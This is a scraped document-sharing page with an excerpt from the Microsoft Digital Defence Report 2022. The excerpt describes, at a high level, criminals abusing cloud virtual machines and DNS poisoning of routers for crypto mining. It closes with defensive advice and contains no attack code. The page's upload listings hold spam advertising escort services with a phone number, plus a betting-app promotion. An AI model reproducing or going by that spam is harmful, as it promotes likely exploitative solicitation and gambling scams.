servers for C2. Trickbot attack chain 93,868 1 Number of exposed MikroTik routers Distribution of exposed MikroTik routers around the world 26 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Virtual machines as criminal infrastructure The widespread move to the cloud includes cybercriminals who leverage private assets of unwitting victims obtained through phishing or distributing malware credential stealers. Many cybercriminals are choosing to set up their malicious infrastructures on cloud-based virtual machines (VMs), containers and microservices. Once the cybercriminal has access, a sequence of events can occur to set up infrastructure – such as a series of virtual machines through scripting and automated processes. These scripted, automated processes are used to launch malicious activity including large scale email spam attacks, phishing attacks and web pages hosting nefarious content. It can even include setting up a scaled virtual environment carrying out cryptocurrency mining, causing the end victim a bill of hundreds of thousands of dollars at the end of the month. Cybercriminals understand their malicious activity has a limited life span before it is detected and shut down. As a result, they have scaled up and now operate proactively with contingencies top of mind. They have been observed preparing compromised accounts ahead of time and monitoring their environments. As soon as an account (set up using hundreds of thousands of virtual machines) is detected, they traverse to In the past year, Microsoft observed a growing number of attacks that abuse routers for redirecting cryptocurrency mining efforts. Cybercriminals compromise routers connected to mining pools and redirect mining traffic to their associated IP addresses with DNS poisoning attacks, which alters the DNS settings of targeted devices. Affected routers register the wrong IP address to a given domain name, sending their mining resources – or hashes – to pools used by threat actors. These pools might mine anonymous coins associated with criminal activities or use legitimate hashes generated by miners to acquire a percentage of the coin that they mined, thus reaping the rewards. With more than half of known vulnerabilities found in 2021 lacking a patch, updating and securing routers on corporate and private networks remains a significant challenge for device owners and administrators. Crypto criminals abusing IoT devices Gateway devices are an increasingly valuable target for threat actors as the number of known vulnerabilities has grown consistently from year to year. They are being used for crypto mining and other types of malicious activity. As cryptocurrency has become more popular, many individuals and organisations have invested computational power and network resources from devices such as routers to mine coins on the blockchain. However, mining cryptocurrency is a time- and resource-intensive process with a low probability of success. To increase the likelihood of mining a coin, miners pool together in distributed, cooperative networks, receiving hashes relative to the percentage of the coin they succeeded in mining with their connected resources. the next account – already prepared by scripts to be immediately activated – and their malicious activity continues with little to no interruption. Like cloud infrastructure, on-premises infrastructure can be used in attacks with virtual local environments that are unknown to the on-premises user. This requires the initial access point to remain open and accessible. On-premises private assets have also been abused by cybercriminals to initiate an onward chain of cloud infrastructure, set up to obfuscate their origin to avoid suspicious infrastructure creation detection. DNS poisoning of gateway devices compromises legitimate mining activities and redirects resources to criminal mining activities. Actionable insights 1 Implement good cyber hygiene and provide cybersecurity training for employees with guidance for avoiding being socially engineered. 2 Conduct regular automated user activity anomaly checks through detections at scale to help reduce these types of attacks. 3 Update and secure routers on corporate and private networks. Portion of hashes from original pool are stolen by threat actors, or resources are transferred to their pool, or routers have malware on them that steal resources for mining. Miner Miners Cryptocurrency DNS Poisoning Criminal’s pool Pool ASIC Miners Miners Miners Routers Compromising devices for illegal crypto mining. 27 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf
original.pdf

More Related Content

What's hot

AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for Thought
NUS-ISS
 
Cyber security and AI
Cyber security and AICyber security and AI
Cyber security and AI
DexterJanPineda
 
Cyber attacks and IT security management in 2025
Cyber attacks and IT security management in 2025Cyber attacks and IT security management in 2025
Cyber attacks and IT security management in 2025
Radar Cyber Security
 
Artificial Intelligence and Machine Learning for Cybersecurity
Artificial Intelligence and Machine Learning for CybersecurityArtificial Intelligence and Machine Learning for Cybersecurity
Artificial Intelligence and Machine Learning for Cybersecurity
Dr David Probert
 
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Edureka!
 
Cis controls v8_guide (1)
Cis controls v8_guide (1)Cis controls v8_guide (1)
Cis controls v8_guide (1)
MHumaamAl
 
Leveraging Generative AI to Accelerate Graph Innovation for National Security...
Leveraging Generative AI to Accelerate Graph Innovation for National Security...Leveraging Generative AI to Accelerate Graph Innovation for National Security...
Leveraging Generative AI to Accelerate Graph Innovation for National Security...
Neo4j
 
The Importance of Cybersecurity for Digital Transformation
The Importance of Cybersecurity for Digital TransformationThe Importance of Cybersecurity for Digital Transformation
The Importance of Cybersecurity for Digital Transformation
NUS-ISS
 
Aujas incident management webinar deck 08162016
Aujas incident management webinar deck 08162016Aujas incident management webinar deck 08162016
Aujas incident management webinar deck 08162016
Karl Kispert
 
OT Security Architecture & Resilience: Designing for Security Success
OT Security Architecture & Resilience: Designing for Security SuccessOT Security Architecture & Resilience: Designing for Security Success
OT Security Architecture & Resilience: Designing for Security Success
accenture
 
APIsecure 2023 - Exploring Advanced API Security Techniques and Technologies,...
APIsecure 2023 - Exploring Advanced API Security Techniques and Technologies,...APIsecure 2023 - Exploring Advanced API Security Techniques and Technologies,...
APIsecure 2023 - Exploring Advanced API Security Techniques and Technologies,...
apidays
 
Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...
Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...
Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...
Edureka!
 
Artificial Intelligence for Cyber Security
Artificial Intelligence for Cyber SecurityArtificial Intelligence for Cyber Security
Artificial Intelligence for Cyber Security
Priyanshu Ratnakar
 
Impact of Generative AI in Cybersecurity - How can ISO/IEC 27032 help?
Impact of Generative AI in Cybersecurity - How can ISO/IEC 27032 help?Impact of Generative AI in Cybersecurity - How can ISO/IEC 27032 help?
Impact of Generative AI in Cybersecurity - How can ISO/IEC 27032 help?
PECB
 
What is cyber resilience?
What is cyber resilience?What is cyber resilience?
What is cyber resilience?
Aaron Clark-Ginsberg
 
Artificial Intelligence and Cybersecurity
Artificial Intelligence and CybersecurityArtificial Intelligence and Cybersecurity
Artificial Intelligence and Cybersecurity
Olivier Busolini
 
AI Strategy canvas V0.4
AI Strategy canvas V0.4AI Strategy canvas V0.4
AI Strategy canvas V0.4
Sajan Mathew 💡
 
The trade desk (ttd)
The trade desk (ttd)The trade desk (ttd)
The trade desk (ttd)
Invbots Limited
 
Overview of Artificial Intelligence in Cybersecurity
Overview of Artificial Intelligence in CybersecurityOverview of Artificial Intelligence in Cybersecurity
Overview of Artificial Intelligence in Cybersecurity
Olivier Busolini
 
bolttech – Insurtech Innovation Award 2023
bolttech – Insurtech Innovation Award 2023bolttech – Insurtech Innovation Award 2023
bolttech – Insurtech Innovation Award 2023
The Digital Insurer
 

What's hot (20)

AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for Thought
 
Cyber security and AI
Cyber security and AICyber security and AI
Cyber security and AI
 
Cyber attacks and IT security management in 2025
Cyber attacks and IT security management in 2025Cyber attacks and IT security management in 2025
Cyber attacks and IT security management in 2025
 
Artificial Intelligence and Machine Learning for Cybersecurity
Artificial Intelligence and Machine Learning for CybersecurityArtificial Intelligence and Machine Learning for Cybersecurity
Artificial Intelligence and Machine Learning for Cybersecurity
 
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
 
Cis controls v8_guide (1)
Cis controls v8_guide (1)Cis controls v8_guide (1)
Cis controls v8_guide (1)
 
Leveraging Generative AI to Accelerate Graph Innovation for National Security...
Leveraging Generative AI to Accelerate Graph Innovation for National Security...Leveraging Generative AI to Accelerate Graph Innovation for National Security...
Leveraging Generative AI to Accelerate Graph Innovation for National Security...
 
The Importance of Cybersecurity for Digital Transformation
The Importance of Cybersecurity for Digital TransformationThe Importance of Cybersecurity for Digital Transformation
The Importance of Cybersecurity for Digital Transformation
 
Aujas incident management webinar deck 08162016
Aujas incident management webinar deck 08162016Aujas incident management webinar deck 08162016
Aujas incident management webinar deck 08162016
 
OT Security Architecture & Resilience: Designing for Security Success
OT Security Architecture & Resilience: Designing for Security SuccessOT Security Architecture & Resilience: Designing for Security Success
OT Security Architecture & Resilience: Designing for Security Success
 
APIsecure 2023 - Exploring Advanced API Security Techniques and Technologies,...
APIsecure 2023 - Exploring Advanced API Security Techniques and Technologies,...APIsecure 2023 - Exploring Advanced API Security Techniques and Technologies,...
APIsecure 2023 - Exploring Advanced API Security Techniques and Technologies,...
 
Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...
Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...
Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...
 
Artificial Intelligence for Cyber Security
Artificial Intelligence for Cyber SecurityArtificial Intelligence for Cyber Security
Artificial Intelligence for Cyber Security
 
Impact of Generative AI in Cybersecurity - How can ISO/IEC 27032 help?
Impact of Generative AI in Cybersecurity - How can ISO/IEC 27032 help?Impact of Generative AI in Cybersecurity - How can ISO/IEC 27032 help?
Impact of Generative AI in Cybersecurity - How can ISO/IEC 27032 help?
 
What is cyber resilience?
What is cyber resilience?What is cyber resilience?
What is cyber resilience?
 
Artificial Intelligence and Cybersecurity
Artificial Intelligence and CybersecurityArtificial Intelligence and Cybersecurity
Artificial Intelligence and Cybersecurity
 
AI Strategy canvas V0.4
AI Strategy canvas V0.4AI Strategy canvas V0.4
AI Strategy canvas V0.4
 
The trade desk (ttd)
The trade desk (ttd)The trade desk (ttd)
The trade desk (ttd)
 
Overview of Artificial Intelligence in Cybersecurity
Overview of Artificial Intelligence in CybersecurityOverview of Artificial Intelligence in Cybersecurity
Overview of Artificial Intelligence in Cybersecurity
 
bolttech – Insurtech Innovation Award 2023
bolttech – Insurtech Innovation Award 2023bolttech – Insurtech Innovation Award 2023
bolttech – Insurtech Innovation Award 2023
 

Similar to original.pdf

Microsoft Digital Defense Report 2022.pdf
Microsoft Digital Defense Report 2022.pdfMicrosoft Digital Defense Report 2022.pdf
Microsoft Digital Defense Report 2022.pdf
Nirenj George
 
Microsoft Digital Defense Executive Summary-2022
Microsoft Digital Defense Executive Summary-2022Microsoft Digital Defense Executive Summary-2022
Microsoft Digital Defense Executive Summary-2022
Kevin Fream
 
MDDR_FINAL_2023_1004_Comprehensive and full
MDDR_FINAL_2023_1004_Comprehensive and fullMDDR_FINAL_2023_1004_Comprehensive and full
MDDR_FINAL_2023_1004_Comprehensive and full
haris21044
 
An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...
An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...
An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...
ijtsrd
 
Dell Technologies Cyber Security playbook
Dell Technologies Cyber Security playbookDell Technologies Cyber Security playbook
Dell Technologies Cyber Security playbook
Margarete McGrath
 
Journal of Computer and System Sciences 80 (2014) 973–993Con
Journal of Computer and System Sciences 80 (2014) 973–993ConJournal of Computer and System Sciences 80 (2014) 973–993Con
Journal of Computer and System Sciences 80 (2014) 973–993Con
karenahmanny4c
 
Journal of Computer and System Sciences 80 (2014) 973–993Con.docx
Journal of Computer and System Sciences 80 (2014) 973–993Con.docxJournal of Computer and System Sciences 80 (2014) 973–993Con.docx
Journal of Computer and System Sciences 80 (2014) 973–993Con.docx
croysierkathey
 
YiR2022-External-Final.pdf
YiR2022-External-Final.pdfYiR2022-External-Final.pdf
YiR2022-External-Final.pdf
FernandoJaimeEscobar
 
Vision By 2023, the Departme.docx
Vision By 2023, the Departme.docxVision By 2023, the Departme.docx
Vision By 2023, the Departme.docx
jessiehampson
 
CII Whitepaper India Cyber Risk & Resilience Review 2018
CII Whitepaper India Cyber Risk & Resilience Review 2018CII Whitepaper India Cyber Risk & Resilience Review 2018
CII Whitepaper India Cyber Risk & Resilience Review 2018
Confederation of Indian Industry
 
Safeguarding the Digital Realm.pdf
Safeguarding the Digital Realm.pdfSafeguarding the Digital Realm.pdf
Safeguarding the Digital Realm.pdf
jasonuchiha2
 
AN EMPIRICAL STUDY ON CYBER SECURITY THREATS AND ATTACKS
AN EMPIRICAL STUDY ON CYBER SECURITY THREATS AND ATTACKSAN EMPIRICAL STUDY ON CYBER SECURITY THREATS AND ATTACKS
AN EMPIRICAL STUDY ON CYBER SECURITY THREATS AND ATTACKS
Daphne Smith
 
_Cyberspace_ Security and Future Challenges in the Digital World.pdf
_Cyberspace_ Security and Future Challenges in the Digital World.pdf_Cyberspace_ Security and Future Challenges in the Digital World.pdf
_Cyberspace_ Security and Future Challenges in the Digital World.pdf
mbmh111980
 
Strengthening Critical Infrastructure Security.pdf
Strengthening Critical Infrastructure Security.pdfStrengthening Critical Infrastructure Security.pdf
Strengthening Critical Infrastructure Security.pdf
ssuserc1c354
 
A STUDY ON CYBER SECURITY AND ITS RISKS K. Jenifer
A STUDY ON CYBER SECURITY AND ITS RISKS K. JeniferA STUDY ON CYBER SECURITY AND ITS RISKS K. Jenifer
A STUDY ON CYBER SECURITY AND ITS RISKS K. Jenifer
AM Publications
 
Pat Pather- Cyber Security Unchartered: Vigilance, Innovation and Adaptability
Pat Pather- Cyber Security Unchartered: Vigilance, Innovation and AdaptabilityPat Pather- Cyber Security Unchartered: Vigilance, Innovation and Adaptability
Pat Pather- Cyber Security Unchartered: Vigilance, Innovation and Adaptability
itnewsafrica
 
Cyberfort syllabus & career
Cyberfort syllabus & careerCyberfort syllabus & career
Cyberfort syllabus & career
Amit Kumar
 
Cyberfort syllabus & career
Cyberfort syllabus & careerCyberfort syllabus & career
Cyberfort syllabus & career
Amit Kumar
 
AI IN CYBERSECURITY: THE NEW FRONTIER OF DIGITAL PROTECTION
AI IN CYBERSECURITY: THE NEW FRONTIER OF DIGITAL PROTECTIONAI IN CYBERSECURITY: THE NEW FRONTIER OF DIGITAL PROTECTION
AI IN CYBERSECURITY: THE NEW FRONTIER OF DIGITAL PROTECTION
ChristopherTHyatt
 
What Are Cyber Attacks All About? | Cyberroot Risk Advisory
What Are Cyber Attacks All About? | Cyberroot Risk AdvisoryWhat Are Cyber Attacks All About? | Cyberroot Risk Advisory
What Are Cyber Attacks All About? | Cyberroot Risk Advisory
CR Group
 

Similar to original.pdf (20)

Microsoft Digital Defense Report 2022.pdf
Microsoft Digital Defense Report 2022.pdfMicrosoft Digital Defense Report 2022.pdf
Microsoft Digital Defense Report 2022.pdf
 
Microsoft Digital Defense Executive Summary-2022
Microsoft Digital Defense Executive Summary-2022Microsoft Digital Defense Executive Summary-2022
Microsoft Digital Defense Executive Summary-2022
 
MDDR_FINAL_2023_1004_Comprehensive and full
MDDR_FINAL_2023_1004_Comprehensive and fullMDDR_FINAL_2023_1004_Comprehensive and full
MDDR_FINAL_2023_1004_Comprehensive and full
 
An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...
An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...
An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...
 
Dell Technologies Cyber Security playbook
Dell Technologies Cyber Security playbookDell Technologies Cyber Security playbook
Dell Technologies Cyber Security playbook
 
Journal of Computer and System Sciences 80 (2014) 973–993Con
Journal of Computer and System Sciences 80 (2014) 973–993ConJournal of Computer and System Sciences 80 (2014) 973–993Con
Journal of Computer and System Sciences 80 (2014) 973–993Con
 
Journal of Computer and System Sciences 80 (2014) 973–993Con.docx
Journal of Computer and System Sciences 80 (2014) 973–993Con.docxJournal of Computer and System Sciences 80 (2014) 973–993Con.docx
Journal of Computer and System Sciences 80 (2014) 973–993Con.docx
 
YiR2022-External-Final.pdf
YiR2022-External-Final.pdfYiR2022-External-Final.pdf
YiR2022-External-Final.pdf
 
Vision By 2023, the Departme.docx
Vision By 2023, the Departme.docxVision By 2023, the Departme.docx
Vision By 2023, the Departme.docx
 
CII Whitepaper India Cyber Risk & Resilience Review 2018
CII Whitepaper India Cyber Risk & Resilience Review 2018CII Whitepaper India Cyber Risk & Resilience Review 2018
CII Whitepaper India Cyber Risk & Resilience Review 2018
 
Safeguarding the Digital Realm.pdf
Safeguarding the Digital Realm.pdfSafeguarding the Digital Realm.pdf
Safeguarding the Digital Realm.pdf
 
AN EMPIRICAL STUDY ON CYBER SECURITY THREATS AND ATTACKS
AN EMPIRICAL STUDY ON CYBER SECURITY THREATS AND ATTACKSAN EMPIRICAL STUDY ON CYBER SECURITY THREATS AND ATTACKS
AN EMPIRICAL STUDY ON CYBER SECURITY THREATS AND ATTACKS
 
_Cyberspace_ Security and Future Challenges in the Digital World.pdf
_Cyberspace_ Security and Future Challenges in the Digital World.pdf_Cyberspace_ Security and Future Challenges in the Digital World.pdf
_Cyberspace_ Security and Future Challenges in the Digital World.pdf
 
Strengthening Critical Infrastructure Security.pdf
Strengthening Critical Infrastructure Security.pdfStrengthening Critical Infrastructure Security.pdf
Strengthening Critical Infrastructure Security.pdf
 
A STUDY ON CYBER SECURITY AND ITS RISKS K. Jenifer
A STUDY ON CYBER SECURITY AND ITS RISKS K. JeniferA STUDY ON CYBER SECURITY AND ITS RISKS K. Jenifer
A STUDY ON CYBER SECURITY AND ITS RISKS K. Jenifer
 
Pat Pather- Cyber Security Unchartered: Vigilance, Innovation and Adaptability
Pat Pather- Cyber Security Unchartered: Vigilance, Innovation and AdaptabilityPat Pather- Cyber Security Unchartered: Vigilance, Innovation and Adaptability
Pat Pather- Cyber Security Unchartered: Vigilance, Innovation and Adaptability
 
Cyberfort syllabus & career
Cyberfort syllabus & careerCyberfort syllabus & career
Cyberfort syllabus & career
 
Cyberfort syllabus & career
Cyberfort syllabus & careerCyberfort syllabus & career
Cyberfort syllabus & career
 
AI IN CYBERSECURITY: THE NEW FRONTIER OF DIGITAL PROTECTION
AI IN CYBERSECURITY: THE NEW FRONTIER OF DIGITAL PROTECTIONAI IN CYBERSECURITY: THE NEW FRONTIER OF DIGITAL PROTECTION
AI IN CYBERSECURITY: THE NEW FRONTIER OF DIGITAL PROTECTION
 
What Are Cyber Attacks All About? | Cyberroot Risk Advisory
What Are Cyber Attacks All About? | Cyberroot Risk AdvisoryWhat Are Cyber Attacks All About? | Cyberroot Risk Advisory
What Are Cyber Attacks All About? | Cyberroot Risk Advisory
 

Recently uploaded

Mahipalpur @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Arti Singh Top Model Safe
Mahipalpur @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Arti Singh Top Model SafeMahipalpur @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Arti Singh Top Model Safe
Mahipalpur @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Arti Singh Top Model Safe
tarun sharma$A17
 
Right Choice Landscaping offers exceptional villa landscape maintenance servi...
Right Choice Landscaping offers exceptional villa landscape maintenance servi...Right Choice Landscaping offers exceptional villa landscape maintenance servi...
Right Choice Landscaping offers exceptional villa landscape maintenance servi...
rightchoicelandscapi
 
Mastering Web Design: Essential Principles and Techniques for Modern Websites
Mastering Web Design: Essential Principles and Techniques for Modern WebsitesMastering Web Design: Essential Principles and Techniques for Modern Websites
Mastering Web Design: Essential Principles and Techniques for Modern Websites
webOdoctor Inc
 
十大欧洲杯投注app平台-十大靠谱欧洲杯投注app官方平台 |【​网址​🎉ac10.net🎉​】
十大欧洲杯投注app平台-十大靠谱欧洲杯投注app官方平台 |【​网址​🎉ac10.net🎉​】十大欧洲杯投注app平台-十大靠谱欧洲杯投注app官方平台 |【​网址​🎉ac10.net🎉​】
十大欧洲杯投注app平台-十大靠谱欧洲杯投注app官方平台 |【​网址​🎉ac10.net🎉​】
antonellispunches643
 
An Introduction to Housing: Core Concepts and Historical Evolution from Prehi...
An Introduction to Housing: Core Concepts and Historical Evolution from Prehi...An Introduction to Housing: Core Concepts and Historical Evolution from Prehi...
An Introduction to Housing: Core Concepts and Historical Evolution from Prehi...
Aditi Sh.
 
Balhani 1st yr (1).pdfhshhshshshshshshshdhdhdh
Balhani 1st yr (1).pdfhshhshshshshshshshdhdhdhBalhani 1st yr (1).pdfhshhshshshshshshshdhdhdh
Balhani 1st yr (1).pdfhshhshshshshshshshdhdhdh
NakulJain35
 
Fall/winter Trend forcasting 2025 ppt .pdf
Fall/winter Trend forcasting 2025 ppt .pdfFall/winter Trend forcasting 2025 ppt .pdf
Fall/winter Trend forcasting 2025 ppt .pdf
Simran Choudhary
 
AI in UX AI in UX - Exploring the Future of Design by FoF Nuremberg.pdf
AI in UX AI in UX - Exploring the Future of Design by FoF Nuremberg.pdfAI in UX AI in UX - Exploring the Future of Design by FoF Nuremberg.pdf
AI in UX AI in UX - Exploring the Future of Design by FoF Nuremberg.pdf
taranenkovictoria
 
Design Impulse: Boost the power of design
Design Impulse: Boost the power of designDesign Impulse: Boost the power of design
Design Impulse: Boost the power of design
Pieter van Langen
 
Ghaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model Safe
Ghaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model SafeGhaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model Safe
Ghaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model Safe
nikhilkumarji0156
 
Doc3boq.docx sjnnw wimow womowmmo wekmomopmp
Doc3boq.docx sjnnw wimow womowmmo wekmomopmpDoc3boq.docx sjnnw wimow womowmmo wekmomopmp
Doc3boq.docx sjnnw wimow womowmmo wekmomopmp
Dhio3
 
Portfolio of Family Coat of Arms, devised by Kasyanenko Rostyslav, ENG
Portfolio of Family Coat of Arms, devised by Kasyanenko Rostyslav, ENGPortfolio of Family Coat of Arms, devised by Kasyanenko Rostyslav, ENG
Portfolio of Family Coat of Arms, devised by Kasyanenko Rostyslav, ENG
Rostyslav Kasyanenko
 
Karol Bagh @ℂall @Girls ꧁❤ 9873777170 ❤꧂Glamorous sonam Mehra Top Model Safe
Karol Bagh @ℂall @Girls ꧁❤ 9873777170 ❤꧂Glamorous sonam Mehra Top Model SafeKarol Bagh @ℂall @Girls ꧁❤ 9873777170 ❤꧂Glamorous sonam Mehra Top Model Safe
Karol Bagh @ℂall @Girls ꧁❤ 9873777170 ❤꧂Glamorous sonam Mehra Top Model Safe
shoeb2926
 
Ghaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Jya Khan Top Model Safe
Ghaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Jya Khan Top Model SafeGhaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Jya Khan Top Model Safe
Ghaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Jya Khan Top Model Safe
pawankumar98845
 
Paharganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model Safe
Paharganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model SafePaharganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model Safe
Paharganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model Safe
dakshishsingh98798
 
ITR Filing for the year of the 2023-24 .pdf
ITR Filing for the year of the 2023-24 .pdfITR Filing for the year of the 2023-24 .pdf
ITR Filing for the year of the 2023-24 .pdf
shyamraj39
 
2024_summer_my_dream_gnjp_20240705_ks.pdf
2024_summer_my_dream_gnjp_20240705_ks.pdf2024_summer_my_dream_gnjp_20240705_ks.pdf
2024_summer_my_dream_gnjp_20240705_ks.pdf
kousato1
 
A Green City is an urban area that prioritizes sustainability
A Green City is an urban area that prioritizes sustainabilityA Green City is an urban area that prioritizes sustainability
A Green City is an urban area that prioritizes sustainability
Mostafa Abd Elrahman
 
Daryaganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Ruhi Singla Top Model Safe
Daryaganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Ruhi Singla Top Model SafeDaryaganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Ruhi Singla Top Model Safe
Daryaganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Ruhi Singla Top Model Safe
jiya khan$A17
 
Dwarka @ℂall @Girls ꧁❤ 9873777170 ❤꧂Fabulous sonam Mehra Top Model Safe
Dwarka @ℂall @Girls ꧁❤ 9873777170 ❤꧂Fabulous sonam Mehra Top Model SafeDwarka @ℂall @Girls ꧁❤ 9873777170 ❤꧂Fabulous sonam Mehra Top Model Safe
Dwarka @ℂall @Girls ꧁❤ 9873777170 ❤꧂Fabulous sonam Mehra Top Model Safe
Jinni singh$A17
 

Recently uploaded (20)

Mahipalpur @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Arti Singh Top Model Safe
Mahipalpur @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Arti Singh Top Model SafeMahipalpur @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Arti Singh Top Model Safe
Mahipalpur @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Arti Singh Top Model Safe
 
Right Choice Landscaping offers exceptional villa landscape maintenance servi...
Right Choice Landscaping offers exceptional villa landscape maintenance servi...Right Choice Landscaping offers exceptional villa landscape maintenance servi...
Right Choice Landscaping offers exceptional villa landscape maintenance servi...
 
Mastering Web Design: Essential Principles and Techniques for Modern Websites
Mastering Web Design: Essential Principles and Techniques for Modern WebsitesMastering Web Design: Essential Principles and Techniques for Modern Websites
Mastering Web Design: Essential Principles and Techniques for Modern Websites
 
十大欧洲杯投注app平台-十大靠谱欧洲杯投注app官方平台 |【​网址​🎉ac10.net🎉​】
十大欧洲杯投注app平台-十大靠谱欧洲杯投注app官方平台 |【​网址​🎉ac10.net🎉​】十大欧洲杯投注app平台-十大靠谱欧洲杯投注app官方平台 |【​网址​🎉ac10.net🎉​】
十大欧洲杯投注app平台-十大靠谱欧洲杯投注app官方平台 |【​网址​🎉ac10.net🎉​】
 
An Introduction to Housing: Core Concepts and Historical Evolution from Prehi...
An Introduction to Housing: Core Concepts and Historical Evolution from Prehi...An Introduction to Housing: Core Concepts and Historical Evolution from Prehi...
An Introduction to Housing: Core Concepts and Historical Evolution from Prehi...
 
Balhani 1st yr (1).pdfhshhshshshshshshshdhdhdh
Balhani 1st yr (1).pdfhshhshshshshshshshdhdhdhBalhani 1st yr (1).pdfhshhshshshshshshshdhdhdh
Balhani 1st yr (1).pdfhshhshshshshshshshdhdhdh
 
Fall/winter Trend forcasting 2025 ppt .pdf
Fall/winter Trend forcasting 2025 ppt .pdfFall/winter Trend forcasting 2025 ppt .pdf
Fall/winter Trend forcasting 2025 ppt .pdf
 
AI in UX AI in UX - Exploring the Future of Design by FoF Nuremberg.pdf
AI in UX AI in UX - Exploring the Future of Design by FoF Nuremberg.pdfAI in UX AI in UX - Exploring the Future of Design by FoF Nuremberg.pdf
AI in UX AI in UX - Exploring the Future of Design by FoF Nuremberg.pdf
 
Design Impulse: Boost the power of design
Design Impulse: Boost the power of designDesign Impulse: Boost the power of design
Design Impulse: Boost the power of design
 
Ghaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model Safe
Ghaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model SafeGhaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model Safe
Ghaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model Safe
 
Doc3boq.docx sjnnw wimow womowmmo wekmomopmp
Doc3boq.docx sjnnw wimow womowmmo wekmomopmpDoc3boq.docx sjnnw wimow womowmmo wekmomopmp
Doc3boq.docx sjnnw wimow womowmmo wekmomopmp
 
Portfolio of Family Coat of Arms, devised by Kasyanenko Rostyslav, ENG
Portfolio of Family Coat of Arms, devised by Kasyanenko Rostyslav, ENGPortfolio of Family Coat of Arms, devised by Kasyanenko Rostyslav, ENG
Portfolio of Family Coat of Arms, devised by Kasyanenko Rostyslav, ENG
 
